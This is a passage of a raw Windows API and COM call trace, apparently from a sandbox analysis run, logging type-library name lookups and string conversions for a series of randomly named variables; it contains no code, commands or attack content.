pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.775] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.775] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a60afe | out: _Dst=0x67c2d40) returned 0x0 [0068.775] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_wZA_UQGo") returned 0x103f67 [0068.775] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_wZA_UQGo" | out: _Dst="_B_var_wZA_UQGo") returned 0x0 [0068.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_wZA_UQGo") returned 16 [0068.775] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.775] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_wZA_UQGo", lHashVal=0x103f67, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.775] IUnknown:Release (This=0x665ba50) returned 0xb [0068.775] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.775] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_wZA_UQGo", lHashVal=0x103f67, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.775] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.775] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.775] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_wZA_UQGo", lHashVal=0x103f67, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.775] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.775] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.775] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_wZA_UQGo", lHashVal=0x103f67, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.775] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.775] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.775] IUnknown:Release (This=0x665ba50) returned 0xb [0068.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc23ba, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_wZA_UQGo") returned 16 [0068.775] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_wZA_UQGo", lHashVal=0x103f67, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x55005f00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x55005f00000000, pDummy=0x0) returned 0x0 [0068.775] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a60afe | out: _Dst=0x144ec0) returned 0x0 [0068.775] ITypeComp:RemoteBind (in: This=0x665ba60, szName="YU_ACX", lHashVal=0x10ad18, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60ad6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="YU_ACX") returned 7 [0068.776] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="YU_ACX", lHashVal=0x10ad18, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60ad6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="YU_ACX") returned 7 [0068.776] ITypeComp:RemoteBind (in: This=0x665bd30, szName="YU_ACX", lHashVal=0x10ad18, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.776] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="YU_ACX") returned 0x10ad18 [0068.776] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="YU_ACX" | out: _Dst="YU_ACX") returned 0x0 [0068.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="YU_ACX") returned 7 [0068.776] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.776] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="YU_ACX", lHashVal=0x10ad18, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.776] IUnknown:Release (This=0x665ba50) returned 0xb [0068.776] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.776] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="YU_ACX", lHashVal=0x10ad18, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.776] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.776] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.776] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="YU_ACX", lHashVal=0x10ad18, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.776] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.776] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.776] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="YU_ACX", lHashVal=0x10ad18, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.776] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60ad6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="YU_ACX") returned 7 [0068.776] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="YU_ACX", lHashVal=0x10ad18, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.776] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.776] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a60ad6 | out: _Dst=0x67c2d40) returned 0x0 [0068.776] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_YU_ACX") returned 0x102782 [0068.776] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_YU_ACX" | out: _Dst="_B_var_YU_ACX") returned 0x0 [0068.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_YU_ACX") returned 14 [0068.777] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.777] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_YU_ACX", lHashVal=0x102782, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.777] IUnknown:Release (This=0x665ba50) returned 0xb [0068.777] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.777] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_YU_ACX", lHashVal=0x102782, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.777] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.777] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.777] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_YU_ACX", lHashVal=0x102782, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.777] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.777] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.777] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_YU_ACX", lHashVal=0x102782, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.777] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.777] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.777] IUnknown:Release (This=0x665ba50) returned 0xb [0068.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc23ea, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_YU_ACX") returned 14 [0068.777] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_YU_ACX", lHashVal=0x102782, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x59005f00720061, ppTypeComp=0x43004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x59005f00720061, ppTypeComp=0x43004100000000, pDummy=0x0) returned 0x0 [0068.777] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a60ad6 | out: _Dst=0x144ec0) returned 0x0 [0068.777] ITypeComp:RemoteBind (in: This=0x665ba60, szName="pUAAGUAA", lHashVal=0x10681c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60b52, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="pUAAGUAA") returned 9 [0068.777] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="pUAAGUAA", lHashVal=0x10681c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60b52, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="pUAAGUAA") returned 9 [0068.777] ITypeComp:RemoteBind (in: This=0x665bd30, szName="pUAAGUAA", lHashVal=0x10681c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.777] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pUAAGUAA") returned 0x10681c [0068.777] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="pUAAGUAA" | out: _Dst="pUAAGUAA") returned 0x0 [0068.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="pUAAGUAA") returned 9 [0068.778] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.778] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="pUAAGUAA", lHashVal=0x10681c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.778] IUnknown:Release (This=0x665ba50) returned 0xb [0068.778] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.778] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="pUAAGUAA", lHashVal=0x10681c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.778] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.778] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.778] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="pUAAGUAA", lHashVal=0x10681c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.778] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.778] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.778] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="pUAAGUAA", lHashVal=0x10681c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.778] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60b52, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="pUAAGUAA") returned 9 [0068.778] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="pUAAGUAA", lHashVal=0x10681c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.778] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.778] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a60b52 | out: _Dst=0x67c2d40) returned 0x0 [0068.778] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_pUAAGUAA") returned 0x103024 [0068.778] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_pUAAGUAA" | out: _Dst="_B_var_pUAAGUAA") returned 0x0 [0068.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_pUAAGUAA") returned 16 [0068.778] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.778] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_pUAAGUAA", lHashVal=0x103024, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.778] IUnknown:Release (This=0x665ba50) returned 0xb [0068.778] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.778] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_pUAAGUAA", lHashVal=0x103024, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.778] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.778] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.778] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_pUAAGUAA", lHashVal=0x103024, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.778] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.778] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.779] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_pUAAGUAA", lHashVal=0x103024, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.779] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.779] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.779] IUnknown:Release (This=0x665ba50) returned 0xb [0068.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc241a, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_pUAAGUAA") returned 16 [0068.779] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_pUAAGUAA", lHashVal=0x103024, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x70005f00720061, ppTypeComp=0x47004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x70005f00720061, ppTypeComp=0x47004100000000, pDummy=0x0) returned 0x0 [0068.779] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a60b52 | out: _Dst=0x144ec0) returned 0x0 [0068.779] IMalloc:Realloc (This=0x7fefec05380, pv=0xafa6b90, cb=0x800) returned 0x62b9100 [0068.779] ITypeComp:RemoteBind (in: This=0x665ba60, szName="IDAAUX", lHashVal=0x10c4c5, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60b7e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="IDAAUX") returned 7 [0068.779] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="IDAAUX", lHashVal=0x10c4c5, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60b7e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="IDAAUX") returned 7 [0068.779] ITypeComp:RemoteBind (in: This=0x665bd30, szName="IDAAUX", lHashVal=0x10c4c5, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.779] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="IDAAUX") returned 0x10c4c5 [0068.779] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="IDAAUX" | out: _Dst="IDAAUX") returned 0x0 [0068.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="IDAAUX") returned 7 [0068.779] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.779] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="IDAAUX", lHashVal=0x10c4c5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.779] IUnknown:Release (This=0x665ba50) returned 0xb [0068.779] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.779] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="IDAAUX", lHashVal=0x10c4c5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.779] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.779] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.779] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="IDAAUX", lHashVal=0x10c4c5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.780] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.780] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.780] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="IDAAUX", lHashVal=0x10c4c5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.780] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60b7e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="IDAAUX") returned 7 [0068.780] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="IDAAUX", lHashVal=0x10c4c5, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.780] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.780] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a60b7e | out: _Dst=0x67c2d40) returned 0x0 [0068.780] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_IDAAUX") returned 0x103f2f [0068.780] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_IDAAUX" | out: _Dst="_B_var_IDAAUX") returned 0x0 [0068.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_IDAAUX") returned 14 [0068.780] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.780] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_IDAAUX", lHashVal=0x103f2f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.780] IUnknown:Release (This=0x665ba50) returned 0xb [0068.780] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.780] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_IDAAUX", lHashVal=0x103f2f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.780] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.780] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.780] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_IDAAUX", lHashVal=0x103f2f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.780] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.780] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.780] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_IDAAUX", lHashVal=0x103f2f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.780] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.780] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.780] IUnknown:Release (This=0x665ba50) returned 0xb [0068.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc244a, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_IDAAUX") returned 14 [0068.780] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_IDAAUX", lHashVal=0x103f2f, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x49005f00720061, ppTypeComp=0x55004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x49005f00720061, ppTypeComp=0x55004100000000, pDummy=0x0) returned 0x0 [0068.780] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a60b7e | out: _Dst=0x144ec0) returned 0x0 [0068.780] ITypeComp:RemoteBind (in: This=0x665ba60, szName="ucAABc", lHashVal=0x10402d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60ba6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="ucAABc") returned 7 [0068.781] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="ucAABc", lHashVal=0x10402d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60ba6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="ucAABc") returned 7 [0068.781] ITypeComp:RemoteBind (in: This=0x665bd30, szName="ucAABc", lHashVal=0x10402d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.781] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ucAABc") returned 0x10402d [0068.781] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="ucAABc" | out: _Dst="ucAABc") returned 0x0 [0068.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="ucAABc") returned 7 [0068.781] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.781] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="ucAABc", lHashVal=0x10402d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: 